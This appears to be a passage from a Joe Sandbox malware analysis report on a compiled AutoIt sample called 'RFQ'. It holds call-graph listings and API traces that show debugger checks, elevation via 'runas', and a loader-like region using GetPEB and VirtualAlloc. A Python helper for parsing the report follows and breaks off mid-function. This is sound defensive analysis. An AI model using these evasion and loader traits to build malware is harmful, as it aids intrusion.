___std_exception_copy 21 API calls 87851->87852 87853 6f20ba 87852->87853 87853->87833 87855 6ae614 ___BuildCatchObject 87854->87855 87856 6ae63a 87855->87856 87857 6ae625 87855->87857 87865 6ae635 __wsopen_s 87856->87865 87868 6a911d EnterCriticalSection 87856->87868 87885 6af269 20 API calls _abort 87857->87885 87860 6ae62a 87886 6b277c 26 API calls pre_c_initialization 87860->87886 87861 6ae656 87869 6ae592 87861->87869 87864 6ae661 87887 
6ae67e LeaveCriticalSection __fread_nolock 87864->87887 87865->87845 87867->87842 87868->87861 87870 6ae59f 87869->87870 87871 6ae5b4 87869->87871 87920 6af269 20 API calls _abort 87870->87920 87877 6ae5af 87871->87877 87888 6adb9b 87871->87888 87873 6ae5a4 87921 6b277c 26 API calls pre_c_initialization 87873->87921 87877->87864 87881 6ae5d6 87905 6b85cf 87881->87905 87884 6b2958 _free 20 API calls 87884->87877 87885->87860 87886->87865 87887->87865 87889 6adbb3 87888->87889 87890 6adbaf 87888->87890 87889->87890 87891 6ad8e5 __fread_nolock 26 API calls 87889->87891 87894 6b4d0a 87890->87894 87892 6adbd3 87891->87892 87922 6b594e 62 API calls 5 library calls 87892->87922 87895 6b4d20 87894->87895 87896 6ae5d0 87894->87896 87895->87896 87897 6b2958 _free 20 API calls 87895->87897 87898 6ad8e5 87896->87898 87897->87896 87899 6ad8f1 87898->87899 87900 6ad906 87898->87900 87923 6af269 20 API calls _abort 87899->87923 87900->87881 87902 6ad8f6 87924 6b277c 26 API calls pre_c_initialization 87902->87924 87904 6ad901 87904->87881 87906 6b85de 87905->87906 87907 6b85f3 87905->87907 87928 6af256 20 API calls _abort 87906->87928 87909 6b862e 87907->87909 87914 6b861a 87907->87914 87930 6af256 20 API calls _abort 87909->87930 87911 6b85e3 87929 6af269 20 API calls _abort 87911->87929 87912 6b8633 87931 6af269 20 API calls _abort 87912->87931 87925 6b85a7 87914->87925 87917 6ae5dc 87917->87877 87917->87884 87918 6b863b 87932 6b277c 26 API calls pre_c_initialization 87918->87932 87920->87873 87921->87877 87922->87890 87923->87902 87924->87904 87933 6b8525 87925->87933 87927 6b85cb 87927->87917 87928->87911 87929->87917 87930->87912 87931->87918 87932->87917 87934 6b8531 ___BuildCatchObject 87933->87934 87935 6b50d7 __wsopen_s EnterCriticalSection 87934->87935 87936 6b853f 87935->87936 87937 6b8571 87936->87937 87938 6b8566 87936->87938 87940 6af269 _free 20 API calls 87937->87940 87939 6b864e __wsopen_s 29 API calls 87938->87939 87941 6b856c 87939->87941 87940->87941 87942 
6b859b LeaveCriticalSection 87941->87942 87943 6b858e __wsopen_s 87942->87943 87943->87927 88002 6c1ef0 87944->88002 87947 685959 87949 6884e7 22 API calls 87947->87949 87948 685974 88004 68bfbf 87948->88004 87951 685965 87949->87951 87952 68562b 22 API calls 87951->87952 87953 68483d 87952->87953 87954 6847d0 87953->87954 87955 6c1ef0 __wsopen_s 87954->87955 87956 6847dd GetLongPathNameW 87955->87956 87957 6884e7 22 API calls 87956->87957 87958 684805 87957->87958 87959 685489 87958->87959 87960 68c25d 22 API calls 87959->87960 87961 68549b 87960->87961 87962 68592d 23 API calls 87961->87962 87963 6854a6 87962->87963 87964 6854b1 87963->87964 87969 6c404a 87963->87969 87965 686aff 22 API calls 87964->87965 87967 6854bd 87965->87967 88010 68285a 87967->88010 87970 6c406c 87969->87970 88016 69d5dc 41 API calls 87969->88016 87971 6854d0 87971->87446 87973 68686d 94 API calls 87972->87973 87974 68634d 87973->87974 87975 6c456a 87974->87975 87977 68686d 94 API calls 87974->87977 87976 6f2c17 80 API calls 87975->87976 87978 6c457f 87976->87978 87979 686361 87977->87979 87980 6c45a0 87978->87980 87981 6c4583 87978->87981 87979->87975 87982 686369 87979->87982 87984 69fd8b 22 API calls 87980->87984 87983 6868db 68 API calls 87981->87983 87985 6c458b 87982->87985 87986 686375 87982->87986 87983->87985 88001 6c45e5 87984->88001 88142 6ed978 82 API calls 87985->88142 88017 68ad7c 87986->88017 87989 6c4599 87989->87980 87990 6844e2 87990->87310 87990->87312 87991 6c4796 87996 6c479e 87991->87996 87992 6868db 68 API calls 87992->87996 87996->87992 88144 6e97b9 82 API calls __wsopen_s 87996->88144 87998 68b606 22 API calls 87998->88001 88001->87991 88001->87996 88001->87998 88119 6e959c 88001->88119 88122 6f0a78 88001->88122 88128 68bd9d 88001->88128 88136 685e82 88001->88136 88143 6e94cb 42 API calls _wcslen 88001->88143 88003 68593a GetFullPathNameW 88002->88003 88003->87947 88003->87948 88005 68bfd9 88004->88005 88006 68bfcc 88004->88006 88007 69fd5b 22 API calls 
88005->88007 88006->87951 88008 68bfe3 88007->88008 88009 69fd8b 22 API calls 88008->88009 88009->88006 88011 68288b __fread_nolock 88010->88011 88012 68286c 88010->88012 88013 69fd5b 22 API calls 88011->88013 88014 69fd8b 22 API calls 88012->88014 88015 6828a2 88013->88015 88014->88011 88015->87971 88016->87969 88018 6cf9b1 88017->88018 88019 68ada5 88017->88019 88181 6e97b9 82 API calls __wsopen_s 88018->88181 88020 69fd8b 22 API calls 88019->88020 88022 68adc9 88020->88022 88024 687bee CloseHandle 88022->88024 88023 6cf9c4 88029 68ae2f 88023->88029 88025 68add7 88024->88025 88026 68c25d 22 API calls 88025->88026 88028 68ade0 88026->88028 88027 68ae3d 88030 68c25d 22 API calls 88027->88030 88031 687bee CloseHandle 88028->88031 88029->88027 88182 6ecc1d 88029->88182 88032 68ae49 88030->88032 88034 68ade9 88031->88034 88145 69f962 88032->88145 88036 687bee CloseHandle 88034->88036 88038 68adf2 88036->88038 88163 6870e5 88038->88163 88039 68c25d 22 API calls 88041 68ae61 88039->88041 88043 68592d 23 API calls 88041->88043 88047 68ae6f 88043->88047 88044 6cfde7 88194 6e97b9 82 API calls __wsopen_s 88044->88194 88045 68ae14 88171 686d7e 27 API calls messages 88045->88171 88150 69f945 88047->88150 88048 6cfdfc 88048->88048 88052 68ae26 88172 686d67 SetFilePointerEx SetFilePointerEx SetFilePointerEx 88052->88172 88056 68aeb2 88057 68c25d 22 API calls 88056->88057 88059 68aebb 88057->88059 88058 6cfa3d 88060 687bee CloseHandle 88058->88060 88061 68c25d 22 API calls 88059->88061 88062 6cfa46 88060->88062 88063 68aec4 88061->88063 88064 68686d 94 API calls 88062->88064 88173 686bff 22 API calls 88063->88173 88066 6cfa6e 88064->88066 88068 6cfd7e 88066->88068 88069 6f2c17 80 API calls 88066->88069 88067 68aedb 88070 687cf8 22 API calls 88067->88070 88191 6e97b9 82 API calls __wsopen_s 88068->88191 88072 6cfa91 88069->88072 88073 68aeec SetCurrentDirectoryW 88070->88073 88074 6868db 68 API calls 88072->88074 88078 68aeff 88073->88078 88075 6cfa9f 88074->88075 88075->88068 
88076 6cfaa7 88075->88076 88077 69fd5b 22 API calls 88076->88077 88081 6cfacf 88077->88081 88080 69fd8b 22 API calls 88078->88080 88079 68b058 messages 88159 687bee 88079->88159 88083 68af12 88080->88083 88086 68bd9d 22 API calls 88081->88086 88084 6870c2 22 API calls 88083->88084 88114 68af1d _wcslen 88084->88114 88085 68b08a 88087 687bee CloseHandle 88085->88087 88115 6cfb10 88086->88115 88091 68b09c 88087->88091 88088 68b035 88090 687bee CloseHandle 88088->88090 88089 6cfceb 88188 6f09ea 22 API calls 88089->88188 88093 68b03e SetCurrentDirectoryW 88090->88093 88091->87990 88093->88079 88096 6cfd11 88189 6e40c5 22 API calls __fread_nolock 88096->88189 88098 68bd9d 22 API calls 88098->88115 88100 6cfdca 88193 6e97b9 82 API calls __wsopen_s 88100->88193 88104 6cfdde 88104->88088 88105 6e959c 22 API calls 88105->88115 88108 68b606 22 API calls 88108->88114 88109 68b606 22 API calls 88109->88115 88111 6f0a78 22 API calls 88111->88115 88113 6cfd53 88190 6e97b9 82 API calls __wsopen_s 88113->88190 88114->88088 88114->88100 88114->88108 88174 68b0d9 33 API calls 88114->88174 88175 688fd0 GetStringTypeW 88114->88175 88176 68901d 40 API calls 88114->88176 88177 6890bd GetStringTypeW _wcslen 88114->88177 88178 6a6355 GetStringTypeW _strftime 88114->88178 88179 6890f8 136 API calls 2 library calls 88114->88179 88180 688f2c 22 API calls 88114->88180 88192 6e9464 22 API calls _wcslen 88114->88192 88115->88089 88115->88098 88115->88105 88115->88109 88115->88111 88115->88113 88186 6e94cb 42 API calls _wcslen 88115->88186 88187 688f2c 22 API calls 88115->88187 88117 6cfd6c 88117->88079 88120 69fd8b 22 API calls 88119->88120 88121 6e95cc __fread_nolock 88120->88121 88121->88001 88121->88121 88123 6f0a83 88122->88123 88124 69fd5b 22 API calls 88123->88124 88125 6f0a9a 88124->88125 88126 68b606 22 API calls 88125->88126 88127 6f0aa5 88126->88127 88127->88001 88129 68be27 88128->88129 88134 68bdad __fread_nolock 88128->88134 88131 69fd8b 22 API calls 88129->88131 88130 69fd5b 22 API 
calls 88132 68bdb4 88130->88132 88131->88134 88133 69fd5b 22 API calls 88132->88133 88135 68bdd2 88132->88135 88133->88135 88134->88130 88135->88001 88138 685e95 88136->88138 88140 685f39 88136->88140 88137 685ec7 88137->88140 88141 69fd5b 22 API calls 88137->88141 88138->88137 88139 69fd8b 22 API calls 88138->88139 88139->88137 88140->88001 88141->88137 88142->87989 88143->88001 88144->87996 88146 6c1ef0 __wsopen_s 88145->88146 88147 69f96f GetCurrentDirectoryW 88146->88147 88148 6884e7 22 API calls 88147->88148 88149 68ae55 88148->88149 88149->88039 88195 68b3b0 88150->88195 88153 686e66 88158 686e7d 88153->88158 88154 6c4b49 SetFilePointerEx 88155 686f04 SetFilePointerEx SetFilePointerEx 88156 686ed0 88155->88156 88156->88056 88156->88058 88157 6c4b38 88157->88154 88158->88154 88158->88155 88158->88156 88158->88157 88160 687bf8 88159->88160 88161 687c07 88159->88161 88160->88085 88161->88160 88162 687c0c CloseHandle 88161->88162 88162->88160 88164 6870fc CreateFileW 88163->88164 88165 6c4be2 88163->88165 88166 68711b 88164->88166 88165->88166 88167 6c4be8 CreateFileW 88165->88167 88166->88044 88166->88045 88167->88166 88168 6c4c10 88167->88168 88169 686e66 3 API calls 88168->88169 88170 6c4c1b 88169->88170 88170->88166 88171->88052 88172->88029 88173->88067 88174->88114 88175->88114 88176->88114 88177->88114 88178->88114 88179->88114 88180->88114 88181->88023 88183 6ecc2c 88182->88183 88184 6ecc37 WriteFile 88182->88184 88203 6ecb55 SetFilePointerEx SetFilePointerEx SetFilePointerEx 88183->88203 88184->88027 88186->88115 88187->88115 88188->88096 88189->88079 88190->88117 88191->88117 88192->88114 88193->88104 88194->88048 88196 68b42b 88195->88196 88197 68b3be 88195->88197 88202 69e3db SetFilePointerEx 88196->88202 88198 68ae95 88197->88198 88200 68b3fc ReadFile 88197->88200 88198->88153 88200->88198 88201 68b416 88200->88201 88201->88197 88201->88198 88202->88197 88203->88184 88205 685d0d 88204->88205 88206 685e2a 88204->88206 88205->88206 88207 69fd8b 22 API 
calls 88205->88207 88206->87452 88208 685d34 88207->88208 88209 69fd8b 22 API calls 88208->88209 88214 685da9 88209->88214 88210 685e82 22 API calls 88210->88214 88213 68bd9d 22 API calls 88213->88214 88214->88206 88214->88210 88214->88213 88217 68b7e0 88214->88217 88244 6f0977 22 API calls 88214->88244 88215->87455 88216->87457 88245 687c18 88217->88245 88219 68ba28 88220 68bd9d 22 API calls 88219->88220 88221 68ba42 88220->88221 88221->88214 88224 6d036d __fread_nolock 88227 6d039f 88224->88227 88229 68bd03 88224->88229 88225 68bd9d 22 API calls 88238 68b805 88225->88238 88226 6d0312 88233 69fd5b 22 API calls 88226->88233 88254 6e9600 84 API calls __wsopen_s 88227->88254 88229->88221 88255 6e9600 84 API calls __wsopen_s 88229->88255 88231 68bfbf 22 API calls 88231->88238 88235 6d0333 88233->88235 88234 6d03ad 88236 68bd9d 22 API calls 88234->88236 88239 69fd8b 22 API calls 88235->88239 88237 6d03c3 88236->88237 88237->88221 88238->88219 88238->88224 88238->88225 88238->88226 88238->88227 88238->88229 88238->88231 88240 68be83 22 API calls 88238->88240 88241 68c7c9 22 API calls 88238->88241 88250 684df1 41 API calls _wcslen 88238->88250 88251 68bf6f 22 API calls 88238->88251 88252 6850f7 23 API calls 88238->88252 88253 6851ec 22 API calls __fread_nolock 88238->88253 88239->88224 88240->88238 88243 68b9f9 CharUpperBuffW 88241->88243 88243->88238 88244->88214 88246 69fd8b 22 API calls 88245->88246 88247 687c3d 88246->88247 88248 69fd5b 22 API calls 88247->88248 88249 687c4b 88248->88249 88249->88238 88250->88238 88251->88238 88252->88238 88253->88238 88254->88234 88255->88221 88256->87467 88258 6c42db 88257->88258 88259 685742 88257->88259 88258->88259 88260 6c42e4 DestroyIcon 88258->88260 88259->87473 88283 6ec792 42 API calls _strftime 88259->88283 88260->88259 88262 6857ca 88261->88262 88263 68589e 88261->88263 88264 687c18 22 API calls 88262->88264 88263->87478 88265 6857d8 88264->88265 88266 6c40ca LoadStringW 88265->88266 88267 6857e5 88265->88267 88269 6c40e4 
88266->88269 88268 6884e7 22 API calls 88267->88268 88270 6857fa 88268->88270 88273 68c1c3 22 API calls 88269->88273 88278 68581f ___scrt_fastfail 88269->88278 88271 6c4100 88270->88271 88272 685807 88270->88272 88275 687cf8 22 API calls 88271->88275 88272->88269 88274 685811 88272->88274 88273->88278 88276 687cf8 22 API calls 88274->88276 88277 6c410e 88275->88277 88276->88278 88277->88278 88279 6852b7 22 API calls 88277->88279 88280 685884 Shell_NotifyIconW 88278->88280 88281 6c4130 88279->88281 88280->88263 88282 6852b7 22 API calls 88281->88282 88282->88278 88283->87473 88285 6852ef _wcslen 88284->88285 88286 6c3e7c 88285->88286 88287 685302 88285->88287 88289 69fd5b 22 API calls 88286->88289 88288 68be83 22 API calls 88287->88288 88290 68530f __fread_nolock 88288->88290 88291 6c3e86 88289->88291 88290->87495 88292 69fd8b 22 API calls 88291->88292 88293 6c3eb6 __fread_nolock 88292->88293 88294 68105b 88299 68533e 88294->88299 88296 68106a 88330 6a0023 29 API calls __onexit 88296->88330 88298 681074 88300 68534e __wsopen_s 88299->88300 88301 68c25d 22 API calls 88300->88301 88302 685404 88301->88302 88303 6858e5 24 API calls 88302->88303 88304 68540d 88303->88304 88331 684d82 88304->88331 88307 6852b7 22 API calls 88308 685426 88307->88308 88309 686aff 22 API calls 88308->88309 88310 685435 88309->88310 88311 68c25d 22 API calls 88310->88311 88312 68543e 88311->88312 88313 68bfbf 22 API calls 88312->88313 88314 685447 RegOpenKeyExW 88313->88314 88315 6c3ed5 RegQueryValueExW 88314->88315 88320 685469 88314->88320 88316 6c3f6b RegCloseKey 88315->88316 88317 6c3ef2 88315->88317 88316->88320 88328 6c3f7d _wcslen 88316->88328 88318 69fd8b 22 API calls 88317->88318 88319 6c3f0b 88318->88319 88321 6870c2 22 API calls 88319->88321 88320->88296 88322 6c3f16 RegQueryValueExW 88321->88322 88323 6c3f33 88322->88323 88325 6c3f4d messages 88322->88325 88324 6884e7 22 API calls 88323->88324 88324->88325 88325->88316 88326 68b606 22 API calls 88326->88328 88327 686aff 22 API 
calls 88327->88328 88328->88320 88328->88326 88328->88327 88329 68660f 22 API calls 88328->88329 88329->88328 88330->88298 88332 6c1ef0 __wsopen_s 88331->88332 88333 684d8f GetFullPathNameW 88332->88333 88334 684db1 88333->88334 88335 6884e7 22 API calls 88334->88335 88336 684dcf 88335->88336 88336->88307 88337 6910bf 88338 6910d3 88337->88338 88339 6915b6 88337->88339 88341 6915c2 88338->88341 88342 69fd5b 22 API calls 88338->88342 88411 68c5e7 23 API calls messages 88339->88411 88412 68c5e7 23 API calls messages 88341->88412 88344 6910e5 88342->88344 88344->88341 88345 69113e 88344->88345 88346 69163d 88344->88346 88353 69064d messages 88345->88353 88358 692c10 88345->88358 88413 6f1073 22 API calls 88346->88413 88349 690cae 88417 6f34ba 82 API calls __wsopen_s 88349->88417 88350 68c1c3 22 API calls 88355 6905f4 messages 88350->88355 88354 68c25d 22 API calls 88354->88355 88355->88349 88355->88350 88355->88353 88355->88354 88414 6a01c2 5 API calls __Init_thread_wait 88355->88414 88415 6a0023 29 API calls __onexit 88355->88415 88416 6a0178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 88355->88416 88359 6930b0 88358->88359 88360 692c76 88358->88360 88498 6a01c2 5 API calls __Init_thread_wait 88359->88498 88362 6d6f0c 88360->88362 88363 692c90 88360->88363 88503 706fc3 164 API calls 88362->88503 88418 693220 88363->88418 88365 6930ba 88369 68b606 22 API calls 88365->88369 88374 6930fb 88365->88374 88367 6d6f18 88367->88355 88379 6930d4 88369->88379 88370 693220 9 API calls 88371 692cb6 88370->88371 88373 692cec 88371->88373 88371->88374 88372 6d6f21 88372->88355 88375 6d6f31 88373->88375 88398 692d08 __fread_nolock 88373->88398 88374->88372 88500 68c5e7 23 API calls messages 88374->88500 88504 6f34ba 82 API calls __wsopen_s 88375->88504 88378 693139 88501 69d993 95 API calls 88378->88501 88499 6a0178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 88379->88499 88382 6d6f49 88505 6f34ba 82 API calls __wsopen_s 88382->88505 88383 692e2f 
88385 6d6fac 88383->88385 88386 692e3c 88383->88386 88507 70566c 54 API calls _wcslen 88385->88507 88387 693220 9 API calls 88386->88387 88389 692e49 88387->88389 88394 693220 9 API calls 88389->88394 88404 692ec7 messages 88389->88404 88390 69fd5b 22 API calls 88390->88398 88391 69fd8b 22 API calls 88391->88398 88392 693172 88502 69fa6d 23 API calls 88392->88502 88393 69301d 88393->88355 88399 692e63 88394->88399 88397 692f7b messages 88397->88393 88497 69d593 22 API calls messages 88397->88497 88398->88378 88398->88382 88398->88383 88398->88390 88398->88391 88400 6d6f8d 88398->88400 88398->88404 88399->88404 88405 68c1c3 22 API calls 88399->88405 88506 6f34ba 82 API calls __wsopen_s 88400->88506 88401 693220 9 API calls 88401->88404 88404->88392 88404->88397 88404->88401 88407 687bee CloseHandle 88404->88407 88428 6ff013 88404->88428 88435 6f82f8 88404->88435 88438 7094b2 88404->88438 88441 6f7368 88404->88441 88508 6f34ba 82 API calls __wsopen_s 88404->88508 88405->88404 88407->88404 88411->88341 88412->88346 88413->88353 88414->88355 88415->88355 88416->88355 88417->88353 88419 693261 88418->88419 88421 69323d 88418->88421 88509 6a01c2 5 API calls __Init_thread_wait 88419->88509 88422 692ca0 88421->88422 88511 6a01c2 5 API calls __Init_thread_wait 88421->88511 88422->88370 88423 69326b 88423->88421 88510 6a0178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 88423->88510 88425 69a007 88425->88422 88512 6a0178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 88425->88512 88429 688e90 53 API calls 88428->88429 88430 6ff04d 88429->88430 88431 68b7e0 86 API calls 88430->88431 88432 6ff05d 88431->88432 88434 6ff086 88432->88434 88513 68b5c1 22 API calls 88432->88513 88434->88404 88514 6f9801 88435->88514 88437 6f8308 88437->88404 88577 707e80 88438->88577 88440 7094c2 88440->88404 88442 6f7392 88441->88442 88443 6f7387 88441->88443 88447 68c25d 22 API calls 88442->88447 88480 6f7472 88442->88480 88668 68ce67 39 API calls 88443->88668 88445 
[Remainder of the control-flow graph edge listing (graphviz source of the graph image the report renders). Only the API names attached to graph nodes are recoverable from the text; the chains visible in this part of the listing are:
• AutoIt runtime file helpers, 0x6F73B3-0x6F7615 and 0x6F9820-0x6F9A3C: lstrlenW, GetFileAttributesW, FindFirstFileW, FindClose (0x6ED3EC), SetFilePointerEx x3 (0x686D67), GetLastError, CloseHandle (0x687BEE, 0x687BBE), __fread_nolock (0x6E40C5)
• 0x707EB7-0x708D85: CharLowerBuffW (0x708C15), _wcslen, _strftime (0x708444), GetCurrentProcess + TerminateProcess (0x70821A), FreeLibrary (0x708400), __wsopen_s (0x6F34BA), ___std_exception_copy; VirtualProtect at 0x69FC9D reached through 0x69FBF0
• 0x68F0B0: GetInputState (0x68F107), with a 164-API-call helper at 0x68EB60
• CRT internals 0x6B815E-0x6C08FE: try_get_first_available_module, pre_c_initialization, _abort, ___BuildCatchObject, and _wsopen_s built on CreateFileW (0x6C033B), GetFileType (0x6C0722), GetLastError, CloseHandle, EnterCriticalSection/LeaveCriticalSection (0x6B2EEE, 0x6B5257, 0x6B5264, 0x6B2F36)
• window procedure at 0x684B81 (calls DefWindowProcW at 0x684BFB): PostQuitMessage, SetTimer + RegisterWindowMessageW (0x684C48), CreatePopupMenu, KillTimer, Shell_NotifyIconW (0x684B1D), MoveWindow, SetFocus, DeleteObject + DestroyWindow (0x685ADB)
• separate region at 0x1717488: GetPEB (0x17185A8), Sleep (0x1717381), CreateFileW (0x17175AA), VirtualAlloc (0x1717615), ReadFile (0x1717633), a 13-API-call helper (0x1716378), ExitProcess (0x17176A4)
• 0x681033 via 0x68597B: RegOpenKeyExW (0x6859BB), RegQueryValueExW (0x6859D5), RegCloseKey (0x685A0B); __onexit (0x6A0023)
• 0x681044 via 0x6829FE: GetStdHandle (0x682C30), OleInitialize (0x682C92), InitializeCriticalSectionAndSpinCount, InterlockedExchange, GetCurrentProcess, DuplicateHandle (0x6F003B), CreateThread (0x6F0862), CloseHandle (0x6C3036), RegisterWindowMessageW (0x6834A1)
• 0x68F7E5 via 0x68D010: __Init_thread_wait (0x6A01C2), __onexit (0x6A0023), EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent (0x6A0178), plus helpers with 82 to 94 API calls each (0x7057C9, 0x705C5A, 0x7060F7, 0x705B33, 0x69EC9E, 0x69E596)]

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
[Graph source for the function starting at 0x68615E (basic blocks 0x68615E-0x6C4559; the executed/not-executed colouring is not recoverable from the text). Nodes with calls: 0x68615E call 68c25d, GetVersionExW, call 6884e7; 0x6861DD call 68ad22, call 68562b; 0x68629B GetCurrentProcess, IsWow64Process; 0x6862CF LoadLibraryA; 0x6862E0 GetProcAddress; 0x6862F0 GetNativeSystemInfo; 0x6862FA FreeLibrary; GetSystemInfo at 0x68631C on the path where GetProcAddress fails and at 0x6C455B on the path where LoadLibraryA is skipped.]
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 0068618D
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • GetCurrentProcess.KERNEL32(?,0071D030,00000000,?,?), ref: 006862A2
                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 006862A9
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006862D4
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006862E6
                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006862F4
                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 006862FB
                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00686320
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                            • API String ID: 3290436268-3101561225
                                                                            • Opcode ID: 744398dd600a7919d4bf62904a73b2ad72015f35804b31ecff344d9e29c892a3
                                                                            • Instruction ID: 0e23098abf80c58df11654437a19d0733db3f2d19d02d040a60a24a17475f9f6
                                                                            • Opcode Fuzzy Hash: 744398dd600a7919d4bf62904a73b2ad72015f35804b31ecff344d9e29c892a3
                                                                            • Instruction Fuzzy Hash: E3A1C6218093C0CFC711D7A9BC747E53FE6AF6634BB88D9DDE04193662D6AC4909CB29

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006836D8,?), ref: 0068448D
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006836D8,?), ref: 006844A0
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00751418,00751400,?,?,?,?,?,?,006836D8,?), ref: 00684515
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                              • Part of subcall function 006836FB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,0068453D,00751418,?,?,?,?,?,?,?,006836D8,?), ref: 0068373C
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,00751418,?,?,?,?,?,?,?,006836D8,?), ref: 00684596
                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007459B8,00000010), ref: 006C371C
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00751418,?,?,?,?,?,?,?,006836D8,?), ref: 006C3769
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00742244,00751418,?,?,?,?,?,?,?,006836D8), ref: 006C37F2
                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 006C37F9
                                                                              • Part of subcall function 006845AE: GetSysColorBrush.USER32(0000000F), ref: 006845B9
                                                                              • Part of subcall function 006845AE: LoadCursorW.USER32(00000000,00007F00), ref: 006845C8
                                                                              • Part of subcall function 006845AE: LoadIconW.USER32(00000063), ref: 006845DE
                                                                              • Part of subcall function 006845AE: LoadIconW.USER32(000000A4), ref: 006845F0
                                                                              • Part of subcall function 006845AE: LoadIconW.USER32(000000A2), ref: 00684602
                                                                              • Part of subcall function 006845AE: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0068461A
                                                                              • Part of subcall function 006845AE: RegisterClassExW.USER32(?), ref: 0068466B
                                                                              • Part of subcall function 0068468E: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006846BC
                                                                              • Part of subcall function 0068468E: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006846DD
                                                                              • Part of subcall function 0068468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,006836D8,?), ref: 006846F1
                                                                              • Part of subcall function 0068468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,006836D8,?), ref: 006846FA
                                                                              • Part of subcall function 006856C2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00685793
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                            • String ID: This is a third-party compiled AutoIt script.$runas$Yt
                                                                            • API String ID: 683915450-2091074346
                                                                            • Opcode ID: c5a02fdbb51064dcdb5047e284cf00ed2cf069d457658193b78071af7fec44cb
                                                                            • Instruction ID: cac5f4900c25cf9c4b324fdb854c5593eeed40e3b1387b556c94e9868c42b02b
                                                                            • Opcode Fuzzy Hash: c5a02fdbb51064dcdb5047e284cf00ed2cf069d457658193b78071af7fec44cb
                                                                            • Instruction Fuzzy Hash: F2512FB01483829BC711FF64DC11EFE3BAB9B55742F44862CF491472A2DFA88949C72B
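The two records above show the stub's environment probe (GetVersionExW, IsWow64Process, GetNativeSystemInfo resolved through LoadLibraryA/GetProcAddress with GetSystemInfo as the fallback) and its start-up path (IsDebuggerPresent, the "This is a third-party compiled AutoIt script." message box, ShellExecuteW with "runas" sitting on the stack). The Python below is an added example, not part of the report or of Joe Sandbox: it parses the report's API-line notation (`Api.MODULE(args), ref: address`, optionally prefixed by `Part of subcall function`) and maps each record onto those indicators. The sample lines are copied from the two records; the rule table, the thresholds and every function name are this example's own choices.

```python
"""Parse the "APIs" lines of Joe Sandbox function records and flag the behaviours they show.
Added example; the sample lines are copied from the records on this page, the rule table is
a heuristic of this example and not something Joe Sandbox emits."""
import re

API_LINE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[\w.]+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEXISH = re.compile(r"^[0-9A-Fa-f?]*$")   # raw stack words and unknowns ("?") the tracer prints


def _hex(s):
    try:
        return int(s, 16)
    except ValueError:
        return None


def parse_api_line(line):
    """Return {'api','module','args','ref','subcall'} for one record line, or None if it is not one."""
    m = API_LINE.match(line.strip())
    if not m:
        return None
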